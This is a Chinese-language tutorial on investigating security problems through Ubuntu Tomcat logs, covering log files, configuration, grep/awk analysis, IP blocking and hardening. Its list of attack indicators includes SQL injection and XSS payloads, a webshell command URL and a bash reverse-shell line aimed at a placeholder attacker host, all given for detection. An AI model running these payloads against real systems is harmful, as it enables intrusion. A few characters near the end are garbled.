如何通過Ubuntu Tomcat日志排查安全問題

1. 定位Tomcat日志文件
Ubuntu系統中，Tomcat日志默認存儲在$CATALINA_HOME/logs目錄（$CATALINA_HOME通常為Tomcat安裝路徑，如/opt/tomcat）。關鍵日志文件包括：

• catalina.out：記錄服務器啟動、運行及關閉的詳細信息，包含Java異常堆棧（如內存溢出、Servlet錯誤）；
• localhost_access_log.*.txt：記錄所有HTTP訪問請求（IP、時間、方法、URL、狀態碼），是識別惡意訪問的核心日志；
• localhost.log：記錄Tomcat本地主機的錯誤及訪問信息（如應用啟動失敗、404/500錯誤）；
• manager.log：記錄Tomcat管理應用（如/manager/html）的操作日志（如部署、登錄嘗試）。

2. 配置日志級別與內容
調整日志級別可捕獲更多安全相關信息：

• 編輯$CATALINA_HOME/conf/logging.properties，將org.apache.catalina、org.apache.coyote等包的日志級別從INFO調整為FINE或FINER（如org.apache.catalina.level = FINE），記錄更詳細的調試信息（如請求參數、會話操作）；
• 配置AccessLogValve（在server.xml中）記錄訪問日志的詳細字段，例如添加%r（請求行，包含方法+URL+協議）、%s（響應狀態碼）、%{User-Agent}i（用戶代理），便于分析異常請求模式。

3. 日志分析與異常識別

3.1 關鍵異常類型及特征

• SQL注入：請求參數包含and 1=1、union select、from information_schema等SQL語句（如/login?username=admin'--&password=123）；
• XSS攻擊：請求中嵌入<script>、onerror=alert()等惡意腳本（如/comment?content=<script>alert(1)</script>）；
• 命令執行：參數含系統命令（如/bin/bash、certutil）或反彈Shell語句（如bash -i >& /dev/tcp/attacker_ip/4444 0>&1）；
• Webshell連接：訪問非常規路徑（如/admin.php、/shell.jsp），參數含eval、base64_decode等函數（如/shell.jsp?cmd=whoami）；
• 敏感信息泄露：嘗試訪問web.config、/etc/passwd、.bak（備份文件）、WEB-INF/config.properties等敏感資源。

3.2 常用分析方法

• 手動過濾關鍵字：使用grep命令快速查找異常關鍵詞，例如：

  grep -i "error\|exception\|sql injection\|xss" $CATALINA_HOME/logs/catalina.out  # 查找錯誤與注入關鍵詞
  grep -E "(union.*select|from\s+information_schema)" $CATALINA_HOME/logs/localhost_access_log.*.txt  # 查找SQL注入痕跡
  

• 統計異常頻率：使用awk或sort統計高頻異常（如同一IP的404錯誤次數），例如：

  awk '$9 == 404 {print $1}' $CATALINA_HOME/logs/localhost_access_log.2025-09-23.txt | sort | uniq -c | sort -nr  # 統計404錯誤的IP頻率
  

• 工具自動化分析：使用ELK Stack（Elasticsearch+Logstash+Kibana）、Splunk或Graylog等工具，實現日志的集中存儲、可視化與異常檢測（如實時告警頻繁的404請求）。

4. 響應與加固措施

• 鎖定可疑對象：若發現某IP頻繁發起惡意請求（如每秒10次以上的404錯誤），可通過iptables臨時封禁：

  sudo iptables -A INPUT -s suspicious_ip -j DROP  # 封禁可疑IP
  

• 修復漏洞：根據日志中的錯誤信息修復代碼漏洞（如SQL注入需使用預編譯語句、XSS需轉義輸出），并更新Tomcat至最新版本（修復已知漏洞）；
• 強化配置：禁用不必要的HTTP方法（如OPTIONS、DELETE、PUT，在web.xml中配置安全約束）、隱藏Tomcat版本號（在server.xml中設置server="Apache"）、啟用HTTPS（配置SSL/TLS證書）；
• 實時監控：部署SIEM系統（如Elastic SIEM），整合Tomcat日志與其他系統日志，實現實時威脅檢測與告警。

5. 日志管理與維護

• 日志輪轉：配置logrotate避免日志文件過大（如每天分割catalina.out），保留30天歷史日志以便回溯：

  sudo nano /etc/logrotate.d/tomcat  # 創建或編輯配置文件
  

  添加以下內容：

  /opt/tomcat/logs/catalina.out {
      daily
      rotate 30
      compress
      missingok
      notifempty
      copytruncate
  }
  

• 權限管理：確保日志文件僅能被Tomcat用戶（如tomcat）讀?。ū苊饷舾行畔⑿孤叮?，例如：

  sudo chown -R tomcat:tomcat $CATALINA_HOME/logs  # 設置日志目錄所有者
  sudo chmod -R 640 $CATALINA_HOME/logs/*.log  # 設置日志文件權限
  ```。